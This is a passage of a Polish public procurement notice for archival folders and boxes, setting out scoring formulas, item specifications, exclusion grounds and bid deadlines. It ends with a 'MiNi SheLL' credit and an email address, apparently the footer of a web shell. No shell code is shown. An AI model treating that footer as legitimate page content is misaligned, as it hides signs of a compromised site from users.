cena oferty brutto (liczona z dokładnością do dwóch miejsc po przecinku)<br/>Cn – najniższa łączna cena oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,<br/>Co – cena oferty badanej brutto za realizację zamówienia.<br/>W kryterium „cena oferty” Wykonawca może otrzymać maksymalnie 60 punktów.<br/><br/>2)	kryterium „termin realizacji zamówienia” – T – waga kryterium 40%<br/>W ramach kryterium „termin realizacji zamówienia” (T) oceniany będzie termin realizacji zamówienia wskazany przez Wykonawcę w Formularzu Ofertowym. Ocena zostanie dokonana wg poniższych zasad:<br/><br/>termin realizacji zamówienia – 21 dni od dnia zawarcia umowy – 0 pkt,<br/>termin realizacji zamówienia – 14 dni od dnia zawarcia umowy – 20 pkt,<br/>termin realizacji zamówienia – 10 dni od dnia zawarcia umowy – 40 pkt<br/>W kryterium „termin realizacji zamówienia” Wykonawca może otrzymać maksymalnie 40 punktów.<br/><br/>2.	Łączna liczba punktów uzyskanych przez Wykonawcę zostanie wyliczona na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej, zgodnie ze wzorem:<br/>P = C + T<br/>gdzie:<br/>P – liczba punktów przyznana ofercie (liczona z dokładnością do dwóch miejsc po przecinku). Zasada zaokrąglania – poniżej 5 należy końcówkę pominąć, 5 i powyżej 5 należy zaokrąglić w górę.<br/>C – liczba punktów przyznanych ofercie w kryterium „cena oferty”,<br/>T – liczba punktów przyznanych ofercie w kryterium „termin realizacji zamówienia”<br/><br/>3.	Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>4.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty, które przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, zastosowanie będą miały zapisy art. 248 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa materiałów archiwizacyjnych na potrzeby Podlaskiego Oddziału Regionalnego ARiMR oraz podległych jednostek organizacyjnych na terenie województwa podlaskiego.<br/>2.	Szczegółowy opis przedmiotu zamówienia został zawarty w poniższym zestawieniu:<br/>Lp.	Nazwa towaru	Jednostka miary	Ilość<br/>1	Teczka archiwizacyjna wiązana A4, format na dokumenty A4, materiał: karton o gramaturze mieszczącej się w przedziale 300 - 350 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 5 mm - wymiary od 0 mm do 10 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 120 mm, wymiary zakładki bocznej dł. 320 mm x szer. 150 mm, wymiary zakładki górnej i dolnej dł. 150 mm x szer.160 mm, dostawa w formie złożonej przed bigem.	sztuka	100<br/>2	Teczka archiwizacyjna wiązana, format na dokumenty A4, materiał: karton o gramaturze mieszczącej się w przedziale 300 - 350 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 5 mm - wymiary od 0 mm do 20 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 120 mm, wymiary zakładki bocznej dł. 320 mm x szer. 150 mm, wymiary zakładki górnej i dolnej dł. 150 mm x szer.160 mm, dostawa w formie złożonej przed bigem.	Sztuka	4550<br/>3	Teczka archiwizacyjna wiązana, format na dokumenty A4, materiał: karton o gramaturze mieszczącej się w przedziale 350-400 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 10 mm - wymiary od 0 mm do 40 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 120 mm, wymiary zakładki bocznej dł. 320 mm x szer.140 mm, wymiary zakładki górnej i dolnej dł. 140 mm x szer.180 mm, dostawa w formie złożonej przed bigem.	Sztuka	5050<br/>4	Teczka archiwizacyjna wiązana, format na dokumenty A4, materiał: karton o gramaturze 400 g/m², wiązane tasiemki o długości co najmniej 200 mm, przymocowane w sposób trwały, grzbiet teczki oraz grzbiety zakładek bigowane co 10 mm - wymiary od 0 mm do 60 mm, posiadające trzy zakładki boczne chroniące dokumenty przed wypadnięciem, szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 100 mm, wymiary zakładki bocznej dł. 320 mm x szer. 160 mm, wymiary zakładki górnej i dolnej dł. 160 mm x szer. 190 mm, dostawa w formie złożonej przed bigem.	sztuka	7400<br/>5	Pudełka do dokumentów format A5, wykonane z kartonu. Wymiary: szerokość 110 mm, długość 300 mm, wysokość 160mm. Dostawa w formie złożonej z pokrywą zdejmowaną. Składane bez użycia taśmy i zszywek.	sztuka	125<br/>6	Pudełka do dokumentów - wykonane z kartonu, na dokumenty o formacie A6. Wymiary wewnętrzne: szerokość 160mm, długość 300 mm, wysokość 110mm. Dostawa w formie złożonej. Bez pokrywy. Składane bez użycia taśmy i zszywek.	sztuka	775<br/>7	Pudło archiwizacyjne -wykonane z kartonu na dokumenty o formacie A5. Wymiary wewnętrzne: szerokość 220mm,długość 300 mm, wysokość 160 mm. Dostawa w formie złożonej. Z pokrywą zdejmowaną. Składane bez użycia taśmy i zszywek.	sztuka	440<br/>8	Pudło archiwizacyjne -wykonane z twardej tektury falistej na dokumenty o formacie A4. Wymiary wewnętrzne: szerokość 100 mm x długość 323 mm, wysokość 264mm.Otwór ułatwiający wyjęcie pudełka. Dostawa w formie złożonej. Pokrywa/klapa połączona z pudełkiem na krawędzi o dł. 323 mm. Składane bez użycia taśmy i zszywek.	sztuka	420<br/>Zgodnie ze Wspólnym Słownikiem Zamówień:<br/>Główny przedmiot: 22.85.00.00-3 skoroszyty i podobne wyroby<br/>3.	Warunki wykonania zamówienia zostały opisane w SWZ </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 42956,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">22850000-3 - Skoroszyty i podobne wyroby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym dokumentach zamówienia i zostanie oceniona jako najkorzystniejsza w oparciu o podane poniżej kryteria wyboru:<br/><br/>1)	kryterium „cena oferty” – C – waga kryterium 60%<br/>W ramach kryterium „cena oferty” (C) oceniana będzie najniższa łączna cena oferty brutto za realizację całości zamówienia podana w Formularzu Ofertowym. Ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = Cn/Co x 60 pkt<br/>gdzie:<br/>C – liczba punktów przyznanych ofercie w kryterium łączna cena oferty brutto (liczona z dokładnością do dwóch miejsc po przecinku)<br/>Cn – najniższa łączna cena oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,<br/>Co – cena oferty badanej brutto za realizację zamówienia.<br/>W kryterium „cena oferty” Wykonawca może otrzymać maksymalnie 60 punktów.<br/><br/>2)	kryterium „termin realizacji zamówienia” – T – waga kryterium 40%<br/>W ramach kryterium „termin realizacji zamówienia” (T) oceniany będzie termin realizacji zamówienia wskazany przez Wykonawcę w Formularzu Ofertowym. Ocena zostanie dokonana wg poniższych zasad:<br/><br/>termin realizacji zamówienia – 21 dni od dnia zawarcia umowy – 0 pkt,<br/>termin realizacji zamówienia – 14 dni od dnia zawarcia umowy – 20 pkt,<br/>termin realizacji zamówienia – 10 dni od dnia zawarcia umowy – 40 pkt<br/>W kryterium „termin realizacji zamówienia” Wykonawca może otrzymać maksymalnie 40 punktów.<br/><br/>2.	Łączna liczba punktów uzyskanych przez Wykonawcę zostanie wyliczona na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej, zgodnie ze wzorem:<br/>P = C + T<br/>gdzie:<br/>P – liczba punktów przyznana ofercie (liczona z dokładnością do dwóch miejsc po przecinku). Zasada zaokrąglania – poniżej 5 należy końcówkę pominąć, 5 i powyżej 5 należy zaokrąglić w górę.<br/>C – liczba punktów przyznanych ofercie w kryterium „cena oferty”,<br/>T – liczba punktów przyznanych ofercie w kryterium „termin realizacji zamówienia”<br/><br/>3.	Oferta Wykonawcy może uzyskać maksymalnie 100 punktów.<br/>4.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty, które przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, zastosowanie będą miały zapisy art. 248 Ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Ustawy, z zastrzeżeniem art. 110 ust. 2-3 Ustawy,<br/>2)	nie podlegają wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835 ze zm.)<br/>2.	Wykonawca jest zobowiązany wykazać niepodleganie wykluczeniu z postępowania i spełnianie warunków udziału w postępowaniu.<br/>3.	Ocena spełniania w/w zostanie dokonana w oparciu o informacje zawarte w przedłożonych przez Wykonawcę oświadczeniach lub dokumentach wyszczególnionych w rozdziale VI Specyfikacji. Z treści załączonych dokumentów musi wynikać, że Wykonawca w/w warunki spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia, za pośrednictwem Platformy<br/>Zakupowej, w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych i<br/>dokumentów:<br/>1) na potwierdzenie braku podstawy wykluczenia o której mowa w art. 108. ust. 1. pkt 5) Ustawy – oświadczenia Wykonawcy o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r o ochronie konkurencji i konsumentów<br/>(tj. Dz. U. z 2021 r., poz. 275.), z innym wykonawcą, który złożył odrębną ofertę w niniejszym postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w<br/>niniejszym postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi<br/>Załącznik nr 5 do Specyfikacji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca obowiązany jest złożyć wraz z ofertą (Formularzem ofertowym – Załącznik nr 1 do Specyfikacji) następujące<br/>dokumenty: <br/>1) Formularz cenowy – Załącznik nr 1A do Formularza ofertowego dla części I zamówienia, Załącznik nr 1B do Formularza ofertowego dla części II zamówienia, <br/>2) aktualne na dzień składania ofert Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania (Załącznik nr 2 do<br/>Specyfikacji),<br/>3) aktualne na dzień składania ofert Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik nr 3 do<br/>Specyfikacji),<br/>4) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania, które dostawy wykonają<br/>poszczególni Wykonawcy (członkowie konsorcjum) – (Załącznik nr 4 do Specyfikacji),<br/>5) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy w szczególności w zakresie<br/>podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestrowym,<br/>6) Zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie<br/>będzie dysponował niezbędnymi zasobami, jeżeli Wykonawca powołuje się na zasoby innych podmiotów (Załącznik nr 6 do Specyfikacji).<br/>UWAGA:<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają dostawy/usługi, do<br/>realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania,<br/>które dostawy wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku:<br/>1) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi udokumentować, że nie podlega<br/>wykluczeniu z postępowania na podstawie przesłanek określonych w rozdziale VIII Specyfikacji, co oznacza, że każdy z<br/>Wykonawców składa oddzielnie oświadczenia stanowiące Załączniki nr 2 i 3 do Specyfikacji – zgodnie z art. 125 ust. 4<br/>Ustawy,<br/>2) muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – zgodnie z art. 58 ust. 2 Ustawy,<br/>3) przed podpisaniem umowy przedłożą pełnomocnictwo do zawarcia umowy w sprawie zamówienia publicznego, jeżeli<br/>pełnomocnictwo takie nie zostało dołączone do oferty.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają świadczenia,<br/>do realizacji których te zdolności są wymagane. W takiej sytuacji, zgodnie z art. 117 ust. 4 Ustawy, Wykonawca składa wraz<br/>z ofertą oświadczenie w zakresie wskazania, które świadczenia wykonają poszczególni Wykonawcy (członkowie<br/>konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz zmian dopuszczalnych Ustawą (art. 455 Ustawy) Zamawiający przewiduje zmiany określone poniżej:<br/>1)	działanie siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami,<br/>2)	zmiana sposobu realizacji przedmiotu Umowy wynikającej ze zmian w obowiązujących przepisach prawa mających wpływ na realizację przedmiotu Umowy,<br/>3)	okoliczności związanych z wystąpieniem COVID – 19 mających wpływ na należyte wykonanie Umowy – art. 15r oraz art. 15r1 ustawy o COVID – 19,<br/>4)	zmiany danych identyfikujących Strony Umowy,<br/>5)	zmian mających na celu doprecyzowanie zapisów w treści Umowy, jeśli będą budziły wątpliwości interpretacyjne między Stronami,<br/>6)	zmiany podwykonawcy,<br/>7)	redakcyjne omyłki pisarskie.<br/>2.	Zmiana Umowy nastąpi w formie pisemnego Aneksu do Umowy pod rygorem nieważności, z zastrzeżeniem § 10 ust. 5 Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pozycja planu zamówień publicznych nr 1.2.19

Creat By MiNi SheLL
Email: jattceo@gmail.com